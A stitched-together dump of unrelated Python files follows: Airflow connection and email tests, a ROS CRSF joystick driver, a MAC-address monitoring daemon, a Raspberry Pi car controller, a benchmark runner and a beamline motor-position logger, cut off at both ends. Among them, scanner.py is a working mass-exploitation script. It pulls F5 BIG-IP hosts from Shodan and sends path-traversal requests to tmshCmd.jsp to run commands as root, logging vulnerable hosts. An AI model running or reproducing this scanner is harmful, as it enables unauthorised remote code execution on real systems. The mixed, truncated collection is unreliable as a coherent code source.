'/datadirectory/regex_dir/copying_file_1.txt._COPYING_' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp' }] else: raise FakeSnakeBiteClientException class FakeHDFSHook(object): def __init__(self, conn_id=None): self.conn_id = conn_id def get_conn(self): client = FakeSnakeBiteClient() return client class ConnectionTest(unittest.TestCase): def setUp(self): configuration.load_test_config() utils.db.initdb() os.environ['AIRFLOW_CONN_TEST_URI'] = ( 'postgres://username:password@ec2.compute.com:5432/the_database') os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = ( 'postgres://ec2.compute.com/the_database') def tearDown(self): env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB'] for ev in env_vars: if ev in os.environ: del os.environ[ev] def test_using_env_var(self): c = SqliteHook.get_connection(conn_id='test_uri') self.assertEqual('ec2.compute.com', c.host) self.assertEqual('the_database', c.schema) self.assertEqual('username', c.login) self.assertEqual('password', c.password) self.assertEqual(5432, c.port) def test_using_unix_socket_env_var(self): c = SqliteHook.get_connection(conn_id='test_uri_no_creds') self.assertEqual('ec2.compute.com', c.host) self.assertEqual('the_database', c.schema) self.assertIsNone(c.login) self.assertIsNone(c.password) self.assertIsNone(c.port) def test_param_setup(self): c = models.Connection(conn_id='local_mysql', conn_type='mysql', host='localhost', login='airflow', password='airflow', schema='airflow') self.assertEqual('localhost', c.host) self.assertEqual('airflow', c.schema) self.assertEqual('airflow', c.login) self.assertEqual('airflow', c.password) self.assertIsNone(c.port) def test_env_var_priority(self): c = SqliteHook.get_connection(conn_id='airflow_db') self.assertNotEqual('ec2.compute.com', c.host) os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \ 'postgres://username:password@ec2.compute.com:5432/the_database' c = SqliteHook.get_connection(conn_id='airflow_db') self.assertEqual('ec2.compute.com', c.host) self.assertEqual('the_database', c.schema) self.assertEqual('username', c.login) self.assertEqual('password', c.password) self.assertEqual(5432, c.port) del os.environ['AIRFLOW_CONN_AIRFLOW_DB'] def test_dbapi_get_uri(self): conn = BaseHook.get_connection(conn_id='test_uri') hook = conn.get_hook() self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri()) conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds') hook2 = conn2.get_hook() self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri()) def test_dbapi_get_sqlalchemy_engine(self): conn = BaseHook.get_connection(conn_id='test_uri') hook = conn.get_hook() engine = hook.get_sqlalchemy_engine() self.assertIsInstance(engine, sqlalchemy.engine.Engine) self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url)) def test_get_connections_env_var(self): conns = SqliteHook.get_connections(conn_id='test_uri') assert len(conns) == 1 assert conns[0].host == 'ec2.compute.com' assert conns[0].schema == 'the_database' assert conns[0].login == 'username' assert conns[0].password == 'password' assert conns[0].port == 5432 def test_get_connections_db(self): conns = BaseHook.get_connections(conn_id='airflow_db') assert len(conns) == 1 assert conns[0].host == 'localhost' assert conns[0].schema == 'airflow' assert conns[0].login == 'root' class WebHDFSHookTest(unittest.TestCase): def setUp(self): configuration.load_test_config() def test_simple_init(self): from airflow.hooks.webhdfs_hook import WebHDFSHook c = WebHDFSHook() self.assertIsNone(c.proxy_user) def test_init_proxy_user(self): from airflow.hooks.webhdfs_hook import WebHDFSHook c = WebHDFSHook(proxy_user='someone') self.assertEqual('someone', c.proxy_user) HDFSHook = None if six.PY2: from airflow.hooks.hdfs_hook import HDFSHook import snakebite @unittest.skipIf(HDFSHook is None, "Skipping test because HDFSHook is not installed") class HDFSHookTest(unittest.TestCase): def setUp(self): configuration.load_test_config() os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020' def test_get_client(self): client = HDFSHook(proxy_user='foo').get_conn() self.assertIsInstance(client, snakebite.client.Client) self.assertEqual('localhost', client.host) self.assertEqual(8020, client.port) self.assertEqual('foo', client.service.channel.effective_user) @mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient') @mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections') def test_get_autoconfig_client(self, mock_get_connections, MockAutoConfigClient): c = models.Connection(conn_id='hdfs', conn_type='hdfs', host='localhost', port=8020, login='foo', extra=json.dumps({'autoconfig': True})) mock_get_connections.return_value = [c] HDFSHook(hdfs_conn_id='hdfs').get_conn() MockAutoConfigClient.assert_called_once_with(effective_user='foo', use_sasl=False) @mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient') def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient): HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn() MockAutoConfigClient.assert_called_once_with(effective_user=None, use_sasl=False) @mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections') def test_get_ha_client(self, mock_get_connections): c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs', host='localhost', port=8020) c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs', host='localhost2', port=8020) mock_get_connections.return_value = [c1, c2] client = HDFSHook().get_conn() self.assertIsInstance(client, snakebite.client.HAClient) send_email_test = mock.Mock() class EmailTest(unittest.TestCase): def setUp(self): configuration.conf.remove_option('email', 'EMAIL_BACKEND') @mock.patch('airflow.utils.email.send_email') def test_default_backend(self, mock_send_email): res = utils.email.send_email('to', 'subject', 'content') mock_send_email.assert_called_with('to', 'subject', 'content') self.assertEqual(mock_send_email.return_value, res) @mock.patch('airflow.utils.email.send_email_smtp') def test_custom_backend(self, mock_send_email): configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test') utils.email.send_email('to', 'subject', 'content') send_email_test.assert_called_with( 'to', 'subject', 'content', files=None, dryrun=False, cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed') self.assertFalse(mock_send_email.called) class EmailSmtpTest(unittest.TestCase): def setUp(self): configuration.conf.set('smtp', 'SMTP_SSL', 'False') @mock.patch('airflow.utils.email.send_MIME_email') def test_send_smtp(self, mock_send_mime): attachment = tempfile.NamedTemporaryFile() attachment.write(b'attachment') attachment.seek(0) utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name]) self.assertTrue(mock_send_mime.called) call_args = mock_send_mime.call_args[0] self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0]) self.assertEqual(['to'], call_args[1]) msg = call_args[2] self.assertEqual('subject', msg['Subject']) self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From']) self.assertEqual(2, len(msg.get_payload())) filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"' self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition')) mimeapp = MIMEApplication('attachment') self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload()) @mock.patch('airflow.utils.email.send_MIME_email') def test_send_smtp_with_multibyte_content(self, mock_send_mime): utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8') self.assertTrue(mock_send_mime.called) call_args = mock_send_mime.call_args[0] msg = call_args[2] mimetext = MIMEText('🔥', 'mixed', 'utf-8') self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload()) @mock.patch('airflow.utils.email.send_MIME_email') def test_send_bcc_smtp(self, mock_send_mime): attachment = tempfile.NamedTemporaryFile() attachment.write(b'attachment') attachment.seek(0) utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc') self.assertTrue(mock_send_mime.called) call_args = mock_send_mime.call_args[0] self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0]) self.assertEqual(['to', 'cc', 'bcc'], call_args[1]) msg = call_args[2] self.assertEqual('subject', msg['Subject']) self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From']) self.assertEqual(2, len(msg.get_payload())) self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"', msg.get_payload()[-1].get(u'Content-Disposition')) mimeapp = MIMEApplication('attachment') self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload()) @mock.patch('smtplib.SMTP_SSL') @mock.patch('smtplib.SMTP') def test_send_mime(self, mock_smtp, mock_smtp_ssl): mock_smtp.return_value = mock.Mock() mock_smtp_ssl.return_value = mock.Mock() msg = MIMEMultipart() utils.email.send_MIME_email('from', 'to', msg, dryrun=False) mock_smtp.assert_called_with( configuration.conf.get('smtp', 'SMTP_HOST'), configuration.conf.getint('smtp', 'SMTP_PORT'), ) self.assertTrue(mock_smtp.return_value.starttls.called) mock_smtp.return_value.login.assert_called_with( configuration.conf.get('smtp', 'SMTP_USER'), configuration.conf.get('smtp', 'SMTP_PASSWORD'), ) mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string()) self.assertTrue(mock_smtp.return_value.quit.called) @mock.patch('smtplib.SMTP_SSL') @mock.patch('smtplib.SMTP') def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl): configuration.conf.set('smtp', 'SMTP_SSL', 'True') mock_smtp.return_value = mock.Mock() mock_smtp_ssl.return_value = mock.Mock() utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False) self.assertFalse(mock_smtp.called) mock_smtp_ssl.assert_called_with( configuration.conf.get('smtp', 'SMTP_HOST'), configuration.conf.getint('smtp', 'SMTP_PORT'), ) @mock.patch('smtplib.SMTP_SSL') @mock.patch('smtplib.SMTP') def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl): configuration.conf.remove_option('smtp', 'SMTP_USER') configuration.conf.remove_option('smtp', 'SMTP_PASSWORD') mock_smtp.return_value = mock.Mock() mock_smtp_ssl.return_value = mock.Mock() utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False) self.assertFalse(mock_smtp_ssl.called) mock_smtp.assert_called_with( configuration.conf.get('smtp', 'SMTP_HOST'), configuration.conf.getint('smtp', 'SMTP_PORT'), ) self.assertFalse(mock_smtp.login.called) @mock.patch('smtplib.SMTP_SSL') @mock.patch('smtplib.SMTP') def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl): utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True) self.assertFalse(mock_smtp.called) self.assertFalse(mock_smtp_ssl.called) if __name__ == '__main__': unittest.main()
crsf_drv.py
from dataclasses import dataclass from threading import Lock, Thread from typing import List from construct import Container from time import sleep, time from sensor_msgs.msg import Joy from .joy_publisher import JoyPublisher from serial import Serial from crsf_parser import CRSFParser, PacketsTypes, PacketValidationStatus import rospy @dataclass class CRSFConfiguration: """ CRSF driver configuration """ axis_map: List[int] buttons_map: List[int] serial_port: str serial_baudrate: int joy_message_rate: float failsafe_timeout: float failsafe_axis: List[float] failsafe_buttons: List[float] deadband: float def __repr__(self) -> str: ret = f"""configuration: axis_map:{self.axis_map} buttons_map:{self.buttons_map} serial: {self.serial_port} @ {self.serial_baudrate} joy message rate: {self.joy_message_rate} failsafe: timeout {self.failsafe_timeout}, axis[{self.failsafe_axis}] , buttons [{self.failsafe_buttons}] deadband: {self.deadband} """ return ret class CRSFDrv: """ CRSF Joy Driver implementaton """ def __init__(self, config: CRSFConfiguration, publisher: rospy.Publisher) -> None: self._config = config self._message_pub = publisher self._joy_publisher = JoyPublisher( self._config.axis_map, self._config.buttons_map, self._message_pub ) self._values_lock = Lock() self._last_values = None self._last_update_time: float = 0 self._is_running = True self._crsf_parser = CRSFParser(self.publish) self._publishing_thread = Thread(target=self._publishing_worker) def _set_failsafe(self) -> None: self._joy_publisher.publish( self._config.failsafe_axis, self._config.failsafe_buttons ) def _publishing_worker(self) -> None: try: previous_update = 0 while self._is_running: with self._values_lock: time_since_last_update = time() - self._last_update_time if time_since_last_update > self._config.failsafe_timeout: self._set_failsafe() else: if previous_update != self._last_update_time: previous_update = self._last_update_time self._joy_publisher.remap_and_publish(self._last_values) sleep(1.0 / self._config.joy_message_rate) finally: self._set_failsafe() self._is_running = False def adjust_channel(self, value: float) -> float: value = value if abs(value) > self._config.deadband else 0 value = max(-1.0, min(1.0, value)) return value def publish(self, packet: Container, status: PacketValidationStatus) -> None: if status == PacketValidationStatus.VALID: if packet.header.type == PacketsTypes.RC_CHANNELS_PACKED: with self._values_lock: # derived from CRSF spec Rev7, TICKS_TO_US(x) = ((x - 992) * 5 / 8 + 1500) channels = [ ((x - 992) * 10 / 8000) for x in packet.payload.channels ] channels = [self.adjust_channel(x) for x in channels] # Inversion is a temporary workaround as the parser return them reversed self._last_values = channels[::-1] self._last_update_time = time() else: rospy.logwarn_throttle( 5, f"received invalid data with status {status}, {packet}" ) def run(self) -> None: with Serial( self._config.serial_port, self._config.serial_baudrate, timeout=2 ) as ser: input_data = bytearray() self._is_running = True self._publishing_thread.start() while not rospy.is_shutdown(): values = ser.read(100) input_data.extend(values) self._crsf_parser.parse_stream(input_data) self._is_running = False self._publishing_thread.join()
__init__.py
"""MAC address Monitoring daemon.""" import logging import logging.handlers import threading import signal import ipaddress import daemon import click import netifaces import scapy.all CONFIG = {} ADDRESSES = [] WORKERS = [] SHUTDOWN = threading.Event() logging.basicConfig(format='[%(levelname)-8s] %(message)s') logger = logging.getLogger(__name__) syslog_handler = logging.handlers.SysLogHandler(address='/dev/log') logger.addHandler(syslog_handler) interfaces = netifaces.interfaces() def get_address_list(): """Fetch and return a list of addresses.""" ans, unans = scapy.all.arping( net=CONFIG['address'], timeout=CONFIG['timeout'], verbose=-1 # Disable scapy's log output ) return [x[1].src for x in ans] def update_address_list(): """Perform an address list update.""" logger.debug('Starting address list update') global ADDRESSES ADDRESSES = get_address_list() logger.debug('Address list update completed [addresses=%s]', ADDRESSES) def perform_update_loop(): """Perform an address list update loop.""" while not SHUTDOWN.is_set(): update_address_list() SHUTDOWN.wait(CONFIG['interval']) def start_client(): """Start the monitoring client.""" # Register signal handlers signal.signal(signal.SIGINT, stop_client) signal.signal(signal.SIGTERM, stop_client) # Define workers global WORKERS WORKERS += [threading.Thread(target=perform_update_loop)] # Start all workers [x.start() for x in WORKERS] # Wait for shutdown SHUTDOWN.wait() def stop_client(signum, frame): """Stop the monitoring client.""" logger.debug('Received signal, shutting down [signal=%s]', signum) # Inform workers of shutdown SHUTDOWN.set() # Join all workers [x.join() for x in WORKERS] @click.command() @click.option('--debug/--no-debug', '-d', default=False, help='Enable or disable debug output.') @click.option('--daemon/--no-daemon', default=False, help='Enable or disable daemonizing.') @click.option('--timeout', '-t', default=5, help='Arping timeout.') @click.option('--interval', '-i', default=30, help='Polling interval.') @click.option('--interface', '-if', type=click.Choice(interfaces), help='Network interface to operate on.') @click.option('--address', '-a', help='Network address to operate on.') @click.pass_context def macmond(ctx, **kwargs): """MAC address Monitoring daemon.""" CONFIG.update(kwargs) logger.setLevel(logging.DEBUG if CONFIG['debug'] else logging.INFO) logger.debug('Starting program [config=%s]', CONFIG) if not CONFIG['address']: logger.debug('No network address set, falling back to given interface') if not CONFIG['interface']: logger.critical('No network address or interface set, exiting') ctx.exit(1) # Determine network address/netmask based on interface name logger.debug('Attempting to determine network address for interface [interface=%s]', CONFIG['interface']) addrs = netifaces.ifaddresses(CONFIG['interface']) if netifaces.AF_INET not in addrs: logger.critical('Could not find a valid address [interface=%s]', CONFIG['interface']) ctx.exit(1) net_addr = addrs[netifaces.AF_INET][0] CONFIG['address'] = str(ipaddress.ip_network('%s/%s' % (net_addr['addr'], net_addr['netmask']), strict=False)) logger.debug('Set network address based on interface [address=%s]', CONFIG['address']) if CONFIG['daemon']: logger.debug('Daemonizing program') with daemon.DaemonContext(files_preserve=[syslog_handler]): start_client() else: start_client()
rpi_main.py
#!/usr/bin/env python3 # Receive car control + Transmit video import cv2, imutils, socket, base64 from threading import Thread from communication import SerialTransceiver from utils import rescale import time tcp_server_address = ("192.168.0.119", 10001) udp_server_address = ("192.168.0.119", 10002) # tcp_server_address = ("127.0.0.1", 10001) # udp_server_address = ("127.0.0.1", 10002) tcp_buff_size = 1024 udp_buff_size = 65536 # max buffer size control_vec = [127,127,127] tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) udp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, udp_buff_size) def rx_tcp(): global control_vec print(f"Binding TCP server to {tcp_server_address}") tcp_server_socket.bind(tcp_server_address) tcp_server_socket.listen(1) client_socket, client_address = tcp_server_socket.accept() while True: data = client_socket.recv(tcp_buff_size) if len(data) == 3: control_vec = list(data) # print(f"Received {control_vec} from {client_address}") def tx_udp(): global control_vec print(f"Binding UDP server to {udp_server_address}") udp_server_socket.bind(udp_server_address) vid = cv2.VideoCapture(0) while True: init_msg, client_address = udp_server_socket.recvfrom(udp_buff_size) # receive init message print(f"Received init msg from {client_address}, starting video transmission...") WIDTH=400 while vid.isOpened(): _, frame = vid.read() frame = imutils.resize(frame, width=WIDTH) # if you want to reduce frame size _, buffer = cv2.imencode('.jpg', frame, [cv2.IMWRITE_JPEG_QUALITY, 80]) # compress image msg = base64.b64encode(buffer) # print(f"Encoding: frame({frame.shape[0]*frame.shape[1]*frame.shape[2]}) -> encoded({len(buffer)}) -> base64({len(msg)})") udp_server_socket.sendto(msg, client_address) cv2.putText(frame, str(control_vec), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2) cv2.imshow("TRANSMITTING VIDEO", frame) key = cv2.waitKey(1) & 0xFF if key == ord('q'): udp_server_socket.close() break def set_message(): global control_vec max_lin = 0.1 max_ang = 0.2 while not transceiver.is_stop: vx = rescale(control_vec[0], 0, 256, -max_lin, max_lin) vy = rescale(control_vec[1], 0, 256, -max_lin, max_lin) vt = rescale(control_vec[2], 0, 256, -max_ang, max_ang) vel = [vx, vy, vt] print(f"Set vel to {vel}") transceiver.set_msg(vel) time.sleep(0.1) # ----------------------- main loop ------------------------- transceiver = SerialTransceiver('/dev/ttyACM0', 38400) tcp_thread = Thread(target=rx_tcp) udp_thread = Thread(target=tx_udp) transform_thread = Thread(target=set_message) arduino_thread = Thread(target=transceiver.talk_arduino) tcp_thread.start() udp_thread.start() transform_thread.start() arduino_thread.start() tcp_thread.join() udp_thread.join() transceiver.stop() transform_thread.join() arduino_thread.join()
scanner.py
#!/usr/bin/env python3 import re import sys import requests from time import sleep from shodan import Shodan from datetime import datetime from threading import Thread, activeCount # Shodan API Key (change according to your Shodan API key) api_key = '' # Shodan search query search_query = 'http.title:"BIG-IP&reg;- Redirect"' def getTime(): now = datetime.now() return now.strftime('%H:%M:%S') def showInfo(message): print('[\033[1;94m{}\033[0;m] [*] {}'.format(getTime(), message)) def showFail(message): print('[\033[1;94m{}\033[0;m] [\033[1;91m-\033[0;m] \033[1;91m{}\033[0;m'.format(getTime(), message)) def showSuccess(message): print('[\033[1;94m{}\033[0;m] [\033[1;92m+\033[0;m] \033[1;92m{}\033[0;m'.format(getTime(), message)) def exit(message = None): try: if message is not None: showFail(message) if activeCount() > 1: showInfo('Killing all threads') while activeCount() > 1: sleep(0.001) showInfo('Exiting script') sys.exit() except KeyboardInterrupt: pass def check(ip, port): try: url1 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash' url2 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id' url3 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd' url4 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list' requests.get(url1.format(ip, port), verify=False, timeout=5) requests.get(url2.format(ip, port), verify=False, timeout=5) r = requests.get(url3.format(ip, port), verify=False, timeout=5) if 'uid=0(root)' in r.text: r = requests.get('https://{}:{}/tmui/login.jsp'.format(ip, port), verify=False, timeout=5) hostname = re.search(r'<p\stitle=\"(.*?)\">', r.text).group(1).strip().lower() showSuccess('{} : {} - {} is vulnerable!'.format(ip, port, hostname)) with open('result.txt', 'a+') as f: f.write('{}:{} - {}\n'.format(ip, port, hostname)) f.close() else: showFail('{} : {} is not vulnerable'.format(ip, port)) requests.get(url4.format(ip, port), verify=False, timeout=5) except KeyboardInterrupt: exit('User aborted!') except Exception as e: showFail('{} : {} is not vulnerable'.format(ip, port)) def main(): try: api = Shodan(api_key) showInfo('Querying from Shodan API') showInfo('Using query: {}'.format(search_query)) search = api.search_cursor(search_query) showInfo('Retrieved result from Shodan') showInfo('Starting scanning') for result in search: ip = result['ip_str'].strip() port = result['port'] th = Thread(target=check, args=(ip, port,)) th.daemon = True th.start() while activeCount() > 5: sleep(0.001) while activeCount() > 1: sleep(0.001) exit('Scan ended') except Exception as e: exit(e) if __name__ == '__main__': try: main() except KeyboardInterrupt: exit('User aborted!')
runner.py
from __future__ import print_function __true_print = print # noqa import argparse import datetime import docker import json import multiprocessing import numpy import os import psutil import requests import sys import threading import time def print(*args, **kwargs): # noqa __true_print(*args, **kwargs) sys.stdout.flush() from ann_benchmarks.datasets import get_dataset, DATASETS from ann_benchmarks.algorithms.definitions import (Definition, instantiate_algorithm, get_algorithm_name) from ann_benchmarks.distance import metrics, dataset_transform from ann_benchmarks.results import store_results def run_individual_query(algo, X_train, X_test, distance, count, run_count, batch): prepared_queries = \ (batch and hasattr(algo, "prepare_batch_query")) or \ ((not batch) and hasattr(algo, "prepare_query")) best_search_time = float('inf') for i in range(run_count): print('Run %d/%d...' % (i + 1, run_count)) # a bit dumb but can't be a scalar since of Python's scoping rules n_items_processed = [0] def single_query(v): if prepared_queries: algo.prepare_query(v, count) start = time.time() algo.run_prepared_query() total = (time.time() - start) candidates = algo.get_prepared_query_results() else: start = time.time() candidates = algo.query(v, count) total = (time.time() - start) candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa for idx in candidates] n_items_processed[0] += 1 if n_items_processed[0] % 1000 == 0: print('Processed %d/%d queries...' % (n_items_processed[0], len(X_test))) if len(candidates) > count: print('warning: algorithm %s returned %d results, but count' ' is only %d)' % (algo, len(candidates), count)) return (total, candidates) def batch_query(X): if prepared_queries: algo.prepare_batch_query(X, count) start = time.time() algo.run_batch_query() total = (time.time() - start) else: start = time.time() algo.batch_query(X, count) total = (time.time() - start) results = algo.get_batch_results() candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa for idx in single_results] for v, single_results in zip(X, results)] return [(total / float(len(X)), v) for v in candidates] if batch: results = batch_query(X_test) else: results = [single_query(x) for x in X_test] total_time = sum(time for time, _ in results) total_candidates = sum(len(candidates) for _, candidates in results) search_time = total_time / len(X_test) avg_candidates = total_candidates / len(X_test) best_search_time = min(best_search_time, search_time) verbose = hasattr(algo, "query_verbose") attrs = { "batch_mode": batch, "best_search_time": best_search_time, "candidates": avg_candidates, "expect_extra": verbose, "name": str(algo), "run_count": run_count, "distance": distance, "count": int(count) } additional = algo.get_additional() for k in additional: attrs[k] = additional[k] return (attrs, results) def run(definition, dataset, count, run_count, batch): algo = instantiate_algorithm(definition) assert not definition.query_argument_groups \ or hasattr(algo, "set_query_arguments"), """\ error: query argument groups have been specified for %s.%s(%s), but the \ algorithm instantiated from it does not implement the set_query_arguments \ function""" % (definition.module, definition.constructor, definition.arguments) D = get_dataset(dataset) X_train = numpy.array(D['train']) X_test = numpy.array(D['test']) distance = D.attrs['distance'] print('got a train set of size (%d * %d)' % X_train.shape) print('got %d queries' % len(X_test)) X_train = dataset_transform[distance](X_train) X_test = dataset_transform[distance](X_test) try: prepared_queries = False if hasattr(algo, "supports_prepared_queries"): prepared_queries = algo.supports_prepared_queries() t0 = time.time() memory_usage_before = algo.get_memory_usage() algo.fit(X_train) build_time = time.time() - t0 index_size = algo.get_memory_usage() - memory_usage_before print('Built index in', build_time) print('Index size: ', index_size) query_argument_groups = definition.query_argument_groups # Make sure that algorithms with no query argument groups still get run # once by providing them with a single, empty, harmless group if not query_argument_groups: query_argument_groups = [[]] for pos, query_arguments in enumerate(query_argument_groups, 1): print("Running query argument group %d of %d..." % (pos, len(query_argument_groups))) if query_arguments: algo.set_query_arguments(*query_arguments) descriptor, results = run_individual_query( algo, X_train, X_test, distance, count, run_count, batch) descriptor["build_time"] = build_time descriptor["index_size"] = index_size descriptor["algo"] = get_algorithm_name( definition.algorithm, batch) descriptor["dataset"] = dataset store_results(dataset, count, definition, query_arguments, descriptor, results, batch) finally: algo.done() def run_from_cmdline(): parser = argparse.ArgumentParser() parser.add_argument( '--dataset', choices=DATASETS.keys(), required=True) parser.add_argument( '--algorithm', required=True) parser.add_argument( '--module', required=True) parser.add_argument( '--constructor', required=True) parser.add_argument( '--count', required=True, type=int) parser.add_argument( '--runs', required=True, type=int) parser.add_argument( '--batch', action='store_true') parser.add_argument( 'build') parser.add_argument( 'queries', nargs='*', default=[]) args = parser.parse_args() algo_args = json.loads(args.build) query_args = [json.loads(q) for q in args.queries] definition = Definition( algorithm=args.algorithm, docker_tag=None, # not needed module=args.module, constructor=args.constructor, arguments=algo_args, query_argument_groups=query_args, disabled=False ) run(definition, args.dataset, args.count, args.runs, args.batch) def run_docker(definition, dataset, count, runs, timeout, batch, mem_limit=None): import colors # Think it doesn't work in Python 2 cmd = ['--dataset', dataset, '--algorithm', definition.algorithm, '--module', definition.module, '--constructor', definition.constructor, '--runs', str(runs), '--count', str(count)] if batch: cmd += ['--batch'] cmd.append(json.dumps(definition.arguments)) cmd += [json.dumps(qag) for qag in definition.query_argument_groups] print('Running command', cmd) client = docker.from_env() if mem_limit is None: mem_limit = psutil.virtual_memory().available print('Memory limit:', mem_limit) cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1) if not batch: # Limit to first cpu if not in batch mode cpu_limit = "0" print('Running on CPUs:', cpu_limit) container = client.containers.run( definition.docker_tag, cmd, volumes={ os.path.abspath('ann_benchmarks'): {'bind': '/home/app/ann_benchmarks', 'mode': 'ro'}, os.path.abspath('data'): {'bind': '/home/app/data', 'mode': 'ro'}, os.path.abspath('results'): {'bind': '/home/app/results', 'mode': 'rw'}, }, cpuset_cpus=cpu_limit, mem_limit=mem_limit, detach=True) def stream_logs(): for line in container.logs(stream=True): print(colors.color(line.decode().rstrip(), fg='blue')) if sys.version_info >= (3, 0): t = threading.Thread(target=stream_logs, daemon=True) else: t = threading.Thread(target=stream_logs) t.daemon = True t.start() try: exit_code = container.wait(timeout=timeout) # Exit if exit code if exit_code == 0: return elif exit_code is not None: print(colors.color(container.logs().decode(), fg='red')) raise Exception('Child process raised exception %d' % exit_code) finally: container.remove(force=True)
50-save_log.py
import os import sys import shutil import inspect import time import subprocess import threading from datetime import datetime BlueskyMagics.positioners = motor_txm + motor_optics + motor_pzt + motor_lakeshore class Auto_Log_Save(object): """ Auto save the motor position into logfile (/NSLS2/xf18id1/DATA/Motor_position_log/) at 11pm everyday. """ def __init__(self, interval=1): self.interval = interval thread = threading.Thread(target=self.run, args=()) thread.daemon = True # Daemonize thread thread.start() # Start the execution def run(self): while True: now = datetime.now() if now.hour == 23: save_pos(print_flag=0, comment="routine record") time.sleep(80000) def save_pos(print_flag=0, comment=""): """ Get motor positions and save to file /NSLS2/xf18id1/DATA/Motor_position_log/ To print it out, set print_flag=1 """ class Tee(object): def __init__(self, *files): self.files = files def write(self, obj): for f in self.files: f.write(obj) f.flush() # If you want the output to be visible immediately def flush(self): for f in self.files: f.flush() now = datetime.now() year = np.str(now.year) mon = "{:02d}".format(now.month) day = "{:02d}".format(now.day) hour = "{:02d}".format(now.hour) minu = "{:02d}".format(now.minute) current_date = year + "-" + mon + "-" + day fn = ( "/NSLS2/xf18id1/DATA/Motor_position_log/log-" + current_date + "_" + hour + "-" + minu + ".log" ) f = open(fn, "w") """ original = sys.stdout sys.stdout = Tee(sys.stdout, f) print('\nsaved to file: {}'.format(fn)) sys.stdout = original """ wh_pos(comment) f.write("\n{0} {1}:{2}\n".format(current_date, hour, minu)) lines = wh_pos(comment, 0) f.write("\n".join(lines)) f.write("\n\nsaved to file: {}".format(fn)) f.close() print("\nsaved to file: {}".format(fn)) if print_flag: shutil.copyfile(fn, "/NSLS2/xf18id1/DATA/Motor_position_log/tmp.log") os.system( "lp -o cpi=20 -o lpi=10 -o media='letter' -d HP_Color_LaserJet_M553 /NSLS2/xf18id1/DATA/Motor_position_log/tmp.log" ) def wh_pos(comment="", print_on_screen=1): positioners = BlueskyMagics.positioners values = [] for p in positioners: try: values.append(p.position) except Exception as exc: values.append(exc) headers = [ "Positioner", "Value", "Unit", "Low Limit", "High Limit", "Offset", "Offset_dir", "Encoder Dial", "Encoder Cnt.", "Encoder Res", "Motor Res", "Motor Status", ] LINE_FMT = "{: <16} {: <12} {: <6} {: <12} {: <12} {: <12} {: <12} {: <14} {: <14} {: <14} {: <14} {: <12}" lines = [] lines.append(str(comment) + "\n") lines.append(LINE_FMT.format(*headers)) for p, v in zip(positioners, values): if not isinstance(v, Exception): try: prec = p.precision except Exception: prec = self.FMT_PREC value = np.round(v, decimals=prec) try: low_limit, high_limit = p.limits except Exception as exc: low_limit = high_limit = exc.__class__.__name__ else: low_limit = np.round(low_limit, decimals=prec) high_limit = np.round(high_limit, decimals=prec) try: offset = p.user_offset.get() except Exception as exc: offset = exc.__class__.__name__ else: offset = np.round(offset, decimals=prec) try: encoder = p.dial_readback.value counts = p.dial_counts.value encoder_res = p.encoder_res.value motor_res = p.motor_res.value motor_velocity = p.velocity.value motor_stat = p.motor_stat.value offset_dir = 